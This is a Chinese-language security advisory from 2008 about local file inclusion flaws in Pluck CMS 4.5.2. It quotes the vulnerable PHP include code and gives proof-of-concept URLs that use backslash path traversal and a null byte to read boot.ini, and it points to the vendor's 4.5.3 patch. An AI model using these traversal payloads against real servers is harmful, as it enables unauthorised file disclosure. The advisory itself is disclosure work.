首页    新闻    下载    文档    论坛     最新漏洞    黑客教程    数据库    搜索    小榕软件实验室怀旧版    星际争霸WEB版    最新IP准确查询   
名称: 密码:      忘记密码  马上注册
漏洞公告 :: 最新漏洞公告

Pluck CMS多个本地文件包含漏洞


http://www.gipsky.com/
Pluck CMS多个本地文件包含漏洞

发布日期:2008-08-25

更新日期:2008-08-26



受影响系统:



somp Pluck CMS 4.5.2



不受影响系统:



somp Pluck CMS 4.5.3



描述:BUGTRAQ ID: 30820



pluck是用php编写的简单内容管理系统。







远程攻击者可以利用pluck的predefined_variables.php和blog_include_react.php脚本中的文件包含漏洞执行任意代码。







1. data/inc/themes/predefined_variables.php脚本中的本地文件包含







有漏洞的GET参数为blogpost、cat和file。







15-46行



-----------------



#################################################







//Make sure the file isn%26#39;t accessed directly



if[1] %26amp;%26amp; (!ereg("admin.php", \



$_SERVER[%26#39;SCRIPT_FILENAME%26#39;])) %26amp;%26amp; (!ereg("install.php", $_SERVER[%26#39;SCRIPT_FILENAME%26#39;])) \



%26amp;%26amp; (!ereg("login.php", $_SERVER[%26#39;SCRIPT_FILENAME%26#39;]))){ //Give out an "access denied" \



error echo "access denied";



//Block all other code



exit();



}







//Include Translation data



include ("data/settings/langpref.php");



include ("data/inc/lang/$langpref");



//Get Site-title



$sitetitle = file_get_contents("data/settings/title.dat");







//Get the page-data



$filetoread = $_GET[%26#39;file%26#39;];



$album = $_GET[%26#39;album%26#39;];



$blogpost = $_GET[%26#39;blogpost%26#39;];



$cat = $_GET[%26#39;cat%26#39;];







if [2]) {



include "data/content/$filetoread"; }







elseif ($album) {



$title = $album; }







elseif [3]) {



include("data/blog/$cat/posts/$blogpost"); }







elseif [4] %26amp;%26amp; (!$album) %26amp;%26amp; (!$blogpost)) {



$title = $lang_front1;



$content = $lang_front2; }







#################################################







2. data/inc/blog_include_react.php脚本中的本地文件包含







有漏洞的GET参数为blogpost和cat。







15-30行



-----------------



#################################################







//Make sure the file isn%26#39;t accessed directly



if[5] %26amp;%26amp; (!ereg("admin.php", \



$_SERVER[%26#39;SCRIPT_FILENAME%26#39;])) %26amp;%26amp; (!ereg("install.php", $_SERVER[%26#39;SCRIPT_FILENAME%26#39;])) \



%26amp;%26amp; (!ereg("login.php", $_SERVER[%26#39;SCRIPT_FILENAME%26#39;]))){ //Give out an "access denied" \



error echo "access denied";



//Block all other code



exit();



}







//Predefined variable



$blogpost = $_GET[%26#39;blogpost%26#39;];



$cat = $_GET[%26#39;cat%26#39;];



$pageback = $_GET[%26#39;pageback%26#39;];



list($reactiondir, $extension) = explode(".", $blogpost);







//Include the blogpost



include("data/blog/$cat/posts/$blogpost");







#################################################







攻击者可以从index.php文件利用这个漏洞。







仅在接受反斜杠路径分隔符的系统上才可以利用这些漏洞。



<*来源:Digital Security Research Group



链接:http://marc.info/?l=bugtraq%26amp;m=121968381622040%26amp;w=2

*>



测试方法:<font color='#FF0000'><p align='center'>警 告



以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!</p></font>http://[server]/[installdir]/index.php?file=..\..\..\..\..\..\..\..\..\..\..\..\..\boot.ini



http://[server]/[installdir]/index.php?blogpost=..\..\..\..\..\..\..\..\..\..\..\\..\..\boot.ini



http://[server]/[installdir]/index.php?blogpost=DSecRG%26amp;cat=..\..\..\..\\..\..\..\..\..\..\..\..\..\boot.ini%00



http://[server]/[installdir]/index.php?blogpost=..\..\..\..\..\..\..\..\..\..\..\..\..\\boot.ini



http://[server]/[installdir]/index.php?blogpost=DSecRG%26amp;cat=..\..\..\..\..\..\\..\..\..\..\..\..\..\boot.ini%00



建议:厂商补丁:



somp

----

目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:







http://www.pluck-cms.org/downloads/download.php?file=7
附注
  1. !ereg("index.php", $_SERVER[%26#39;SCRIPT_FILENAME%26#39;]
  2. $filetoread) %26amp;%26amp; (file_exists("data/content/$filetoread"
  3. $blogpost) %26amp;%26amp; (file_exists("data/blog/$cat/posts/$blogpost"
  4. !file_exists("data/content/$filetoread"
  5. !ereg("index.php", $_SERVER[%26#39;SCRIPT_FILENAME%26#39;]
<< VMWare VirtualCenter用户帐号信息泄露漏洞 ezContents CMS多个本地文件包含漏洞 >>
评分
10987654321
API:
gipsky.com & 安信网络

系统导航

 

Copyright © 2001-2010 安信网络. All Rights Reserved
京ICP备14013333号-8